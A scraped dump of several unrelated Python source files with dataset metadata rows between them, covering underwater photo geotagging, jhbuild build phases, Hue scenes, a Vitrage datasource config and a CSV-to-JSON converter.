import json
from ast import literal_eval
from depth_temp_log_io import *
from configuration import *
from gps_log_io import *
from common import *
# That namespace url doesn't really exist. The custom tags seem to work
# without it. Perhaps I should figure out if I really need it or not.
exiv.xmp.register_namespace('http://svarchiteuthis.com/benthicphoto/', 'BenthicPhoto')
class image_directory(object):
def __init__(self, dir_path):
if os.path.isdir(dir_path):
jpgs = [ os.path.join(dir_path,f) for f in os.listdir(dir_path) if f.lower().endswith('.jpg') and not f.startswith('.') ]
else:
raise ValueError("%s is not a directory." % dir_path)
self.path = dir_path
self.images = [ image_file(img) for img in jpgs ]
self.images.sort(key=lambda i: i.datetime) # sort the images by datetime of the image
self.image_count = len( self.images )
def __shift_datetimes__(self, time_delta_obj, verbose=True):
"""
Shift the 'date original' values of all photos in the directory. See the
warnings in the image_file.__set_datetime__ method doc string. You should
be careful about using this method.
"""
for img in self.images:
new_dt = img.__shift_datetime__( time_delta_obj, verbose=verbose )
@property
def local_datetimes(self):
return [ x.datetime for x in self.images ]
@property
def utc_datetimes(self):
return [ x.utc_datetime for x in self.images ]
@property
def exif_depths(self):
d_list = []
for img in self.images:
if img.exif_depth:
d_list.append(img.exif_depth * -1)
else:
d_list.append(0.0)
return np.array(d_list)
@property
def fuzzy_habitat_dict(self):
d = {}
for img in self.images:
for hab in img.xmp_fuzzy_habitats:
try:
d[hab] += 1
except KeyError:
d[hab] = 1
return d
def dive_record_set(self,db_path):
return dive_record_set( min(self.local_datetimes), max(self.local_datetimes), db_path )
def depth_plot(self, db_path, depth_time_offset=None):
"""
Create a plot of the depth profile with photo times and depths marked.
db_path: A string of the path to the sqlite database.
depth_time_offset: An int in seconds to offset x values by. This only
changes the plot. It does not alter any of the values or change
what gets exported to shapefile.
"""
drs = self.dive_record_set(db_path)
y = -1 * drs.depth_time_array[:,0] # depths * -1 to make negative values
x = drs.depth_time_array[:,1] # datetimes
if depth_time_offset:
x = x + td(seconds=depth_time_offset)
fig = plt.figure() # imported from matplotlib
ax = fig.add_subplot(111)
ax.plot_date(x,y,marker='.',linestyle='-',tz=pytz.timezone(LOCAL_TIME_ZONE) ) # LOCAL_TIME_ZONE from configuration.py)
ax.plot(self.local_datetimes,self.exif_depths,'r*',markersize=10,picker=5)
plt.xlabel('Date and Time')
plt.ylabel('Depth (meters)')
fig.suptitle('Photos with Depth and Time')
#print "Before def onpick"
def onpick(event):
global ann
try:
ann.remove()
except NameError:
pass
ind = event.ind[0]
fname = os.path.basename( self.images[ind].file_path )
ann_text = "Photo: %s\ndepth: %g\ndate: %s" % ( fname, self.exif_depths[ind], self.local_datetimes[ind].strftime('%Y/%m/%d %H:%M:%S') )
ann = ax.annotate(ann_text, xy=(self.local_datetimes[ind], self.exif_depths[ind]), xytext=(-20,-20),
textcoords='offset points', ha='center', va='top',
bbox=dict(boxstyle='round,pad=0.2', fc='yellow', alpha=0.3),
arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0.5',
color='red'))
plt.draw()
print "Photo: %s, index: %i, depth: %g, date: %s" % ( fname, ind, self.exif_depths[ind], self.local_datetimes[ind].strftime('%Y/%m/%d %H:%M:%S') )
#print "Before mpl_connect"
fig.canvas.mpl_connect('pick_event', onpick)
plt.show()
#print "after plt show"
def depth_temp_tag(self,db_path,verbose=False):
"""
Depth tag all the photos in the directory.
"""
for img in self.images:
img.depth_temp_tag(db_path,verbose)
class image_file(object):
"""
An object to make accessing image files and metadata easier.
"""
def __init__(self,img_path):
if os.path.exists(img_path):
self.file_path = img_path
md = exiv.ImageMetadata(img_path)
md.read()
self.md = md
else:
raise ValueError( "The file %s does not exist." % (img_path,) )
def __repr__(self):
return "Image file: %s" % (self.file_path,)
def __get_exiv_tag(self,tag_string):
"""
Try to get a pyexiv2 tag. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string]
except KeyError:
return None
def __get_exiv_tag_value(self,tag_string):
"""
Try to get a pyexiv2 tag value. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string].value
except KeyError:
return None
def __get_exiv_tag_human_value(self,tag_string):
"""
Try to get a pyexiv2 tag human value. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string].human_value
except KeyError:
return None
def exif_dict(self, exclude_panasonic_keys=True):
"""
Return a dict with all exif and xmp keys and values.
"""
exif_dict = {}
for key in self.md.xmp_keys:
if self.__get_exiv_tag_value(key):
exif_dict.update( { key : self.__get_exiv_tag_value(key) } )
for key in self.md.exif_keys:
if not ( exclude_panasonic_keys and 'Panasonic' in key.split('.') ):
if self.__get_exiv_tag_human_value(key):
exif_dict.update( { key : self.__get_exiv_tag_human_value(key)[:100] } )
return exif_dict
@property
def file_name(self):
return os.path.basename(self.file_path)
@property
def datetime(self):
"""
Try to get a datetime object for the image's creation from the
Exif.Photo.DateTimeOriginal value via pyexiv2.
"""
if self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal').tzname():
return self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal')
else:
return make_aware_of_local_tz( self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal') )
@property
def utc_datetime(self):
if self.datetime:
return utc_from_local(self.datetime)
else:
return None
@property
def exif_direction(self):
if self.__get_exiv_tag_value('Exif.GPSInfo.GPSImgDirection'):
return float( self.__get_exiv_tag_value('Exif.GPSInfo.GPSImgDirection') )
@property
def exif_lat_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLatitude')
@property
def exif_latref_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLatitudeRef')
@property
def exif_lon_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLongitude')
@property
def exif_lonref_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLongitudeRef')
@property
def exif_depth_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSAltitude')
@property
def exif_depth(self):
try:
ret_val = float( self.__get_exiv_tag_value('Exif.GPSInfo.GPSAltitude') )
except TypeError:
try:
ret_val = self.__get_exiv_tag_value('Exif.GPSInfo.GPSAltitude').to_float()
except AttributeError:
ret_val = None
return ret_val
@property
def __exif_depth_temp_dict(self):
"""
This is a bit of a hack. I couldn't find a good place to store temperature
data in the exif so I went with storing a python dictionary as a string
in Exif.Photo.UserComment. I think I'm going to stop using this and store
this stuff in custom xmp tags instead. UserComment is accessible to many
photo management apps so it seems likely to get corrupted. I made it a
private method but maybe I should have just deleted it.
"""
try:
dstr = self.md['Exif.Photo.UserComment'].value
return literal_eval(dstr)
except KeyError:
return None
@property
def __exif_temperature(self):
"""
This just exposes the temperature value from the hack mentioned in the
doc string for exif_depth_temp_dict. I'm going to stop writing to this
tag so don't be surprised if this returns nothing. Actually, I think I
may just make it a private method because I don't want to delete it.
"""
if self.exif_depth_temp_dict:
return self.exif_depth_temp_dict['temp']
else:
return None
@property
def xmp_temperature(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.temperature')
@property
def xmp_temp_units(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.temp_units')
@property
def xmp_substrate(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.substrate')
@property
def xmp_habitat(self):
"""
xmp_habitat will be set to the dominant habitat type of all the fuzzy
habitats. Specifically, the fuzzy habitat with the highest proportion.
In the event of a tie (multiple fuzzy habitats with the same proportion)
one of the tied habitats will be chosen at random. Assignment happens
in the setHabitat method of the MainWindow in bps_gui.py.
"""
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.habitat')
@property
def xmp_fuzzy_hab_dict(self):
hd_json = self.__get_exiv_tag_value('Xmp.BenthicPhoto.fuzzy_hab_dict')
if hd_json:
return json.loads(hd_json)
else:
return None
@property
def xmp_fuzzy_habitats(self):
habdict = self.xmp_fuzzy_hab_dict
if habdict:
return habdict.keys()
else:
return []
@property
def position(self):
"""
Look at the exif data and return a position object (as defined in
gps_log_io). Return None if there's no GPSInfo in the exif.
"""
if self.exif_lat_tag and self.exif_lon_tag and self.exif_latref_tag and self.exif_lonref_tag:
lat = latitude.from_exif_coord(self.exif_lat_tag.value,self.exif_latref_tag.value)
lon = longitude.from_exif_coord(self.exif_lon_tag.value,self.exif_lonref_tag.value)
return position(lat,lon)
else:
return None
def __set_datetime__(self,dt_obj):
"""
Set the date original in the exif. I don't think you want to do this
but I did want to once. If you lose the origination time for your
image you can not sync it to your gps track or your depth log so
leave this alone unless you're sure you know what you're doing.
If you screw up your data don't come crying to me. I tried to warn
you.
"""
key = 'Exif.Photo.DateTimeOriginal'
self.md[key] = exiv.ExifTag(key,dt_obj)
self.md.write()
return self.datetime
def __shift_datetime__(self,time_delta_obj,verbose=True):
"""
Shift the 'date original' in the exif by the given time delta. See the
warnings in the doc string of __set_datetime__ method. You should be
careful with this.
"""
current_dt = self.datetime
self.__set_datetime__( current_dt + time_delta_obj )
if verbose:
print "datetime of %s changed from %s to %s." % ( self.file_name, current_dt.strftime('%X, %x'), self.datetime.strftime('%X, %x') )
return self.datetime
def __set_exif_position(self,pos,verbose=False):
"""
Set the relevant exif tags to match the position object handed in.
The position object is defined over in gps_log_io.py
"""
pre = 'Exif.GPSInfo.GPS'
add_dict = {pre+'Latitude': pos.lat.exif_coord,
pre+'LatitudeRef': pos.lat.hemisphere,
pre+'Longitude': pos.lon.exif_coord,
pre+'LongitudeRef': pos.lon.hemisphere }
for k,v in add_dict.iteritems():
if verbose:
print "%s = %s" % (str(k),str(v))
self.md[k] = exiv.ExifTag(k,v)
self.md.write()
return True
def __set_exif_depth_temp(self,depth,temp,verbose=False):
from pyexiv2.utils import Rational
if depth < 0: # This can happen because there's a bit of slop in the conversion from pressure to depth
if verbose:
print "Given depth was a negative value."
depth = 0
if not depth:
return None
if not temp:
temp = 0.0 # temperature isn't important at this point so if it's not there we'll just call it zero
pre = 'Exif.GPSInfo.GPS'
#dt_str = "{'depth':%g,'temp':%g}" % (depth,temp)
dfrac = Fraction.from_float(depth).limit_denominator()
add_dict = {pre+'Altitude': Rational(dfrac.numerator,dfrac.denominator),
pre+'AltitudeRef': bytes(1),
}
#'Exif.Photo.UserComment': dt_str }
for k,v in add_dict.iteritems():
if verbose:
print "%s = %s" % (str(k),str(v))
self.md[k] = exiv.ExifTag(k,v)
self.md.write()
return True
def __set_xmp_depth_temp(self,depth,temp):
if not depth:
return None
if not temp:
temp = 0.0 # temperature isn't important at this point so if it's not there we'll just call it zero
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'depth'] = str(depth)
self.md[pre+'depth_units'] = 'meters'
self.md[pre+'temperature'] = str(temp)
self.md[pre+'temp_units'] = 'celsius'
self.md.write()
def set_xmp_substrate(self, subst_str):
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'substrate'] = subst_str
self.md.write()
def set_xmp_habitat(self, subst_str):
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'habitat'] = subst_str
self.md.write()
def set_xmp_fuzzy_habitats(self, habdict):
habdict_json_str = json.dumps(habdict)
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'fuzzy_hab_dict'] = habdict_json_str
self.md.write()
def logger_depth(self,db_path):
"""
Get the logged depth out of the db that matches the photo's timestamp.
"""
if self.utc_datetime:
depth = get_depth_for_time(self.utc_datetime, db_path, reject_threshold=30)
return depth
else:
return None
def logger_temp(self, db_path):
"""
Get the logged temperature out of the db that matches the photo's timestamp.
"""
if self.utc_datetime:
temp = get_temp_for_time(self.utc_datetime, db_path, reject_threshold=30)
return temp
else:
return None
def depth_temp_tag(self,db_path,verbose=False):
"""
Get the depth and temp readings out of the db that match the photo's origination
time (considering that the photo's time stamp is in the local timezone and the
logs are in UTC) and write those values to the image's exif data.
"""
self.__set_exif_depth_temp(self.logger_depth(db_path),self.logger_temp(db_path),verbose=verbose)
self.__set_xmp_depth_temp(self.logger_depth(db_path),self.logger_temp(db_path))
if self.exif_depth_tag:
return self.exif_depth_tag.value
else:
return None
def geotag(self,db_path,verbose=True):
"""
Get a position that matches the time of creation for the image out
of the database and set the exif data accordingly. We assume that
the photo timestamp is local and the gps position is utc.
"""
pos = get_position_for_time(self.utc_datetime,db_path,verbose=verbose)
if verbose and pos:
print "-------------------GeoTagg--------------------------------"
print "%s is going to get set to %s as %s, %s" % ( os.path.basename( self.file_path ), unicode( pos ), str(pos.lat.exif_coord), str(pos.lon.exif_coord) )
print "%s, %s in dms" % ( str(pos.lat.dms), str(pos.lon.dms) )
if pos:
self.__set_exif_position(pos,verbose)
return self.position
def __compare_position__(self,db_path):
"""
This is just for testing. Check to see if the value stored in the db
matches what we display after conversion. I want to make sure I'm not
throwing away precision in coordinate conversions.
"""
pos = get_position_for_time(self.utc_datetime,db_path,verbose=True)
print " db says: %s, %s \nexif says: %s, %s" % ( pos.lat.nmea_string, pos.lon.nmea_string, self.position.lat.nmea_string, self.position.lon.nmea_string )
if pos.lat.nmea_string == self.position.lat.nmea_string:
print "Latitudes match"
if pos.lon.nmea_string == self.position.lon.nmea_string:
print "Longitudes match"
def remove_geotagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['Latitude','LatitudeRef','Longitude','LongitudeRef']
pre = 'Exif.GPSInfo.GPS'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_depthtagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['Altitude','AltitudeRef']
pre = 'Exif.GPSInfo.GPS'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_temptagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['depth','depth_units','temperature','temp_units']
pre = 'Xmp.BenthicPhoto.'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_substratetagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.substrate'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_habitattag(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.habitat'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_fuzzyhabitats(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.fuzzy_hab_dict'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_habitattagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
self.remove_habitattag()
self.remove_fuzzyhabitats()
def remove_all_tagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
self.remove_geotagging()
self.remove_depthtagging()
self.remove_temptagging()
self.remove_substratetagging()
self.remove_habitattagging()
def exif_tag_jpegs(photo_dir,db_path):
for fname in os.listdir(photo_dir):
if fname.lower().endswith('.jpg'):
imf = image_file( os.path.join(photo_dir,fname) )
imf.depth_temp_tag(db_path)
imf.geotag()
if imf.exif_depth_tag:
dstr = imf.exif_depth_tag.human_value
else:
dstr = 'None'
if imf.exif_temperature:
tstr = "%g C" % imf.exif_temperature
else:
tstr = 'None'
print "Image: %s - Depth: %s, Temp %s, Position: %s" % (fname,dstr,tstr,imf.position)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tag a photos with position, depth, and temperature from a gps and a Sensus Ultra depth and temperature logger.')
parser.add_argument('photo_dir', nargs='?', type=str, help='The directory that contains photos you would like tagged.')
parser.add_argument('db_path', nargs='?', type=str, help='The database that contains the depth and location information you want to tag the photos with.')
args = parser.parse_args()
exif_tag_jpegs(args.photo_dir,db_path)
#### Pretty much just testing garbage below here #######
#### Why don't I delete it? Good question. #######
def check_time_tags(img):
md = get_photo_metadata(img)
timetags = [tag for tag in md.exif_keys if tag.find('Time')<>-1]
for t in timetags:
print "%s: %s" % (t,md[t])
def read_gps_crap(img):
md = get_photo_metadata(img_path)
try:
gpstag = md['Exif.Image.GPSTag'].human_value
except KeyError:
gpstag = 'not set'
try:
lat = md['Exif.GPSInfo.GPSLatitude'].human_value
except KeyError:
lat = 'not set'
try:
lon = md['Exif.GPSInfo.GPSLongitude'].human_value
except KeyError:
lon = 'not set'
print "GPSTag: %s, Lat: %s, Lon: %s" % ( str(gpstag), str(lat), str(lon) )
def read_gps_crap_from_dir(dir):
for fname in os.listdir(dir):
if fname.lower().endswith('.jpg'):
read_gps_crap(os.path.join(dir,fname))
def shift_time_for_photos(direc,time_delta):
for fname in os.listdir(direc):
if fname.lower().endswith('.jpg'):
imf = image_file( os.path.join( direc,fname ) )
orig_time = imf.datetime
imf.__set_datetime__( orig_time + time_delta )
print "Changed %s from %s to %s." % ( fname, orig_time.strftime('%H:%M'), imf.datetime.strftime('%H:%M') )
def photo_times_for_dir(dir):
for fname in os.listdir(dir):
if fname.lower().endswith('.jpg'):
img = os.path.join(dir,fname)
md = get_photo_metadata(img)
ptime = get_photo_datetime(md)
if ptime:
ending = ptime.strftime('%Y-%m-%d %H:%M:%S')
else:
ending = 'no time tag'
print "%s: %s" % (fname,ending)
def get_photo_metadata(img_path):
md = exiv.ImageMetadata(img_path)
md.read()
return md
def get_photo_datetime(md):
"""If I find inconsistency in exif tags, I may have to get a little more creative
here."""
try:
ptime = md['Exif.Photo.DateTimeOriginal'].value
except KeyError:
ptime = False
return ptime
|
bsd-3-clause
| 3,740,261,318,711,634,000
| 37.146832
| 165
| 0.565658
| false
| 3.673861
| false
| false
| false
|
rpavlik/jhbuild-vrjuggler
|
jhbuild/frontends/buildscript.py
|
1
|
11073
|
# jhbuild - a build script for GNOME 1.x and 2.x
# Copyright (C) 2001-2006 James Henstridge
# Copyright (C) 2003-2004 Seth Nickell
#
# buildscript.py: base class of the various interface types
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from jhbuild.utils import packagedb
from jhbuild.errors import FatalError, CommandError, SkipToPhase, SkipToEnd
class BuildScript:
def __init__(self, config, module_list=None):
if self.__class__ is BuildScript:
raise NotImplementedError('BuildScript is an abstract base class')
self.modulelist = module_list
self.module_num = 0
self.config = config
# the existence of self.config.prefix is checked in config.py
if not os.access(self.config.prefix, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('install prefix (%s) must be writable') % self.config.prefix)
if not os.path.exists(self.config.checkoutroot):
try:
os.makedirs(self.config.checkoutroot)
except OSError:
raise FatalError(
_('checkout root (%s) can not be created') % self.config.checkoutroot)
if not os.access(self.config.checkoutroot, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('checkout root (%s) must be writable') % self.config.checkoutroot)
if self.config.copy_dir and not os.path.exists(self.config.copy_dir):
try:
os.makedirs(self.config.copy_dir)
except OSError:
raise FatalError(
_('checkout copy dir (%s) can not be created') % self.config.copy_dir)
if not os.access(self.config.copy_dir, os.R_OK|os.W_OK|os.X_OK):
raise FatalError(_('checkout copy dir (%s) must be writable') % self.config.copy_dir)
packagedbdir = os.path.join(self.config.prefix, 'share', 'jhbuild')
try:
if not os.path.isdir(packagedbdir):
os.makedirs(packagedbdir)
except OSError:
raise FatalError(_('could not create directory %s') % packagedbdir)
self.packagedb = packagedb.PackageDB(os.path.join(packagedbdir,
'packagedb.xml'))
def execute(self, command, hint=None, cwd=None, extra_env=None):
'''Executes the given command.
If an error occurs, CommandError is raised. The hint argument
gives a hint about the type of output to expect.
'''
raise NotImplementedError
def build(self, phases=None):
'''start the build of the current configuration'''
self.start_build()
failures = [] # list of modules that couldn't be built
self.module_num = 0
for module in self.modulelist:
self.module_num = self.module_num + 1
if self.config.min_age is not None:
installdate = self.packagedb.installdate(module.name)
if installdate > self.config.min_age:
self.message(_('Skipping %s (installed recently)') % module.name)
continue
self.start_module(module.name)
failed = False
for dep in module.dependencies:
if dep in failures:
if self.config.module_nopoison.get(dep,
self.config.nopoison):
self.message(_('module %(mod)s will be built even though %(dep)s failed')
% { 'mod':module.name, 'dep':dep })
else:
self.message(_('module %(mod)s not built due to non buildable %(dep)s')
% { 'mod':module.name, 'dep':dep })
failed = True
if failed:
failures.append(module.name)
self.end_module(module.name, failed)
continue
if not phases:
build_phases = self.get_build_phases(module)
else:
build_phases = phases
phase = None
num_phase = 0
# if there is an error and a new phase is selected (be it by the
# user or an automatic system), the chosen phase must absolutely
# be executed, it should in no condition be skipped automatically.
# The force_phase variable flags that condition.
force_phase = False
while num_phase < len(build_phases):
last_phase, phase = phase, build_phases[num_phase]
try:
if not force_phase and module.skip_phase(self, phase, last_phase):
num_phase += 1
continue
except SkipToEnd:
break
if not module.has_phase(phase):
# skip phases that do not exist, this can happen when
# phases were explicitely passed to this method.
num_phase += 1
continue
self.start_phase(module.name, phase)
error = None
try:
try:
error, altphases = module.run_phase(self, phase)
except SkipToPhase, e:
try:
num_phase = build_phases.index(e.phase)
except ValueError:
break
continue
except SkipToEnd:
break
finally:
self.end_phase(module.name, phase, error)
if error:
try:
nextphase = build_phases[num_phase+1]
except IndexError:
nextphase = None
newphase = self.handle_error(module, phase,
nextphase, error,
altphases)
force_phase = True
if newphase == 'fail':
failures.append(module.name)
failed = True
break
if newphase is None:
break
if newphase in build_phases:
num_phase = build_phases.index(newphase)
else:
# requested phase is not part of the plan, we insert
# it, then fill with necessary phases to get back to
# the current one.
filling_phases = self.get_build_phases(module, targets=[phase])
canonical_new_phase = newphase
if canonical_new_phase.startswith('force_'):
# the force_ phases won't appear in normal build
# phases, so get the non-forced phase
canonical_new_phase = canonical_new_phase[6:]
if canonical_new_phase in filling_phases:
filling_phases = filling_phases[
filling_phases.index(canonical_new_phase)+1:-1]
build_phases[num_phase:num_phase] = [newphase] + filling_phases
if build_phases[num_phase+1] == canonical_new_phase:
# remove next phase if it would just be a repeat of
# the inserted one
del build_phases[num_phase+1]
else:
force_phase = False
num_phase += 1
self.end_module(module.name, failed)
self.end_build(failures)
if failures:
return 1
return 0
def get_build_phases(self, module, targets=None):
'''returns the list of required phases'''
if targets:
tmp_phases = targets[:]
else:
tmp_phases = self.config.build_targets[:]
i = 0
while i < len(tmp_phases):
phase = tmp_phases[i]
depadd = []
try:
phase_method = getattr(module, 'do_' + phase)
except AttributeError:
# unknown phase for this module type, simply skip
del tmp_phases[i]
continue
if hasattr(phase_method, 'depends'):
for subphase in phase_method.depends:
if subphase not in tmp_phases[:i+1]:
depadd.append(subphase)
if depadd:
tmp_phases[i:i] = depadd
else:
i += 1
# remove duplicates
phases = []
for phase in tmp_phases:
if not phase in phases:
phases.append(phase)
return phases
def start_build(self):
'''Hook to perform actions at start of build.'''
pass
def end_build(self, failures):
'''Hook to perform actions at end of build.
The argument is a list of modules that were not buildable.'''
pass
def start_module(self, module):
'''Hook to perform actions before starting a build of a module.'''
pass
def end_module(self, module, failed):
'''Hook to perform actions after finishing a build of a module.
The argument is true if the module failed to build.'''
pass
def start_phase(self, module, phase):
'''Hook to perform actions before starting a particular build phase.'''
pass
def end_phase(self, module, phase, error):
'''Hook to perform actions after finishing a particular build phase.
The argument is a string containing the error text if something
went wrong.'''
pass
def message(self, msg, module_num=-1):
'''Display a message to the user'''
raise NotImplementedError
def set_action(self, action, module, module_num=-1, action_target=None):
'''inform the buildscript of a new stage of the build'''
raise NotImplementedError
def handle_error(self, module, phase, nextphase, error, altphases):
'''handle error during build'''
raise NotImplementedError
|
gpl-2.0
| 3,736,484,522,379,380,700
| 40.943182
| 101
| 0.530118
| false
| 4.748285
| true
| false
| false
|
Bioto/Huuey-python
|
huuey/hue/scenes/scene.py
|
1
|
1071
|
from huuey.paths import Paths
class Scene:
name = None
lights = []
owner = None
recycle = None
locked = None
appdata = None
picture = None
lastupdated = None
version = None
_id = None
_parent = None
def __init__(self, obj, parent, _id):
self._parent = parent
self._id = _id
self._map(obj)
def get_id(self):
return self._id
def _map(self, obj):
for key in obj:
setattr(self, key, obj)
@staticmethod
def create(name, lights, controller, recycle=False):
request = controller.request(Paths.SceneCREATE, data={
'name': name,
'lights': lights,
'recycle': recycle
})
return request[0]['success']['id']
def activate(self):
return self._parent.request(Paths.SceneGroup, data={
'scene': self._id
})
def delete(self):
self._parent.request(Paths.SceneDEL, additional={
'id': self._id
})
self._parent.remove_scene(self._id)
|
mit
| 6,638,197,520,970,899,000
| 20
| 62
| 0.535948
| false
| 3.894545
| false
| false
| false
|
openstack/vitrage
|
tools/datasource-scaffold/sample/__init__.py
|
1
|
1820
|
# Copyright 2018 - Vitrage team
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from vitrage.common.constants import DatasourceOpts as DSOpts
from vitrage.common.constants import UpdateMethod
SAMPLE_DATASOURCE = 'sample'
OPTS = [
cfg.StrOpt(DSOpts.TRANSFORMER,
default='vitrage.datasources.sample.transformer.'
'SampleTransformer',
help='Sample transformer class path',
required=True),
cfg.StrOpt(DSOpts.DRIVER,
default='vitrage.datasources.sample.driver.'
'SampleDriver',
help='Sample driver class path',
required=True),
cfg.StrOpt(DSOpts.UPDATE_METHOD,
default=UpdateMethod.PULL,
help='None: updates only via Vitrage periodic snapshots.'
'Pull: updates periodically.'
'Push: updates by getting notifications from the'
' datasource itself.',
required=True),
cfg.IntOpt(DSOpts.CHANGES_INTERVAL,
default=30,
min=10,
help='interval in seconds between checking changes in the'
'sample configuration files')]
class SampleFields(object):
TYPE = 'type'
ID = 'id'
|
apache-2.0
| 5,598,332,246,566,623,000
| 36.916667
| 75
| 0.636813
| false
| 4.482759
| false
| false
| false
|
angloc/savutil
|
csv2json.py
|
1
|
3749
|
# Convert a CSV file into a JSON object with distribution
import classifiedunicodevalue
from classifiedunicodevalue import ClassifiedUnicodeValue
from datautil import compressedValueSequence, compressedValues
import unicodecsv
from version import savutilName, savutilVersion
def blankNone (x):
if x is None:
return u""
else:
return unicode (x)
def objectify (x):
if x == "":
return None
else:
try:
i = int (x)
return i
except:
try:
f = float (x)
return g
except:
return x
if __name__ == "__main__":
import getopt
import json
import os
import sys
import xlrd
optlist, args = getopt.getopt(sys.argv[1:], 'ad:h:s:e:o:w:')
delimiter = ","
headerIndex = None
skipLines = None
encoding = "cp1252"
outputPath = ""
worksheetName = None
for (option, value) in optlist:
if option == "-d":
delimiter = value
if option == "-e":
encoding = value
if option == "-h":
headerIndex = int (value)
if option == "-o":
outputPath = value
if option == "-s":
skipLines = int (value)
if option == "-w":
worksheetName = value
if skipLines is None:
if headerIndex is None:
headerIndex = 1
skipLines = headerIndex
if len (args) < 1 or\
headerIndex > skipLines:
print "--Usage: [-d,] [-ecp1252] [-h1] [-s1] <inputFile> [<outputFile>]"
sys.exit (0)
(root, csvExt) = os.path.splitext (args [0])
if not csvExt:
if worksheetName:
csvExt = ".xlsx"
else:
csvExt = ".csv"
inputFilename = root + csvExt
if len (args) > 1:
outputFilename = args [1]
else:
outputFilename = os.path.join (outputPath, root + ".json")
if headerIndex:
print "..Using line %d for headers" % headerIndex
if not (skipLines == 1 and headerIndex == 1):
print "..Taking data from line %d onwards" % skipLines
if worksheetName:
print "..Looking for worksheet '%s' in workbook %s" %\
(worksheetName, inputFilename)
wb = xlrd.open_workbook (inputFilename)
ws = wb.sheet_by_name (worksheetName)
print ws.ncols, ws.nrows
csvRows = [
[ws.cell_value (rowx, colx) for colx in xrange (ws.ncols)]
for rowx in xrange (ws.nrows)
]
else:
csvFile = open (inputFilename)
csv = unicodecsv.UnicodeReader (csvFile, encoding=encoding, delimiter=delimiter)
csvRows = list (csv)
csvFile.close ()
if skipLines > len (csvRows):
print "--Only %d row(s) found in CSV file, %d required for header" %\
(len (csvRows), skipLines)
sys.exit (0)
if headerIndex:
headers = csvRows [headerIndex-1]
csvRows = csvRows [skipLines:]
print "..%d row(s) found in input" % len (csvRows)
jsonObject = {
"origin": "csv2json %s from %s" %
(savutilVersion, inputFilename),
"code_lists": {},
"variable_sequence": headers,
"total_count": len (csvRows),
"variables": {},
"data": {}
}
variables = jsonObject ["variables"]
data = jsonObject ["data"]
for index, variableName in enumerate (headers):
values = [ClassifiedUnicodeValue (row [index]).value for row in csvRows]
distribution = {}
for value in values:
if distribution.has_key (value):
distribution [value] += 1
else:
distribution [value] = 1
cd = classifiedunicodevalue.ClassifiedDistribution (distribution)
if cd.dataType == "integer":
jsonType = "integer"
elif cd.dataType == "decimal":
jsonType = "decimal"
elif cd.dataType == "text":
jsonType = "string"
else:
jsonType = "null"
variables [variableName] = {
"sequence": index + 1,
"name": variableName,
"json_type": jsonType,
"distribution": cd.toObject (includeTotal=False)
}
data [variableName] = compressedValues (values, jsonType)
jsonFile = open (outputFilename, 'wb')
json.dump (jsonObject, jsonFile,
sort_keys=True,
indent=4,
separators=(',', ': ')
)
jsonFile.close ()
|
gpl-2.0
| 4,556,128,825,799,290,000
| 23.503268
| 82
| 0.660443
| false
| 2.987251
| false
| false
| false
|
ideascube/ideascube
|
ideascube/management/commands/tags.py
|
1
|
7027
|
import sys
from itertools import groupby
from operator import itemgetter
from django.utils.termcolors import colorize
from taggit.models import Tag, TaggedItem
from ideascube.management.base import BaseCommandWithSubcommands
from ideascube.utils import sanitize_tag_name
def log(text, **kwargs):
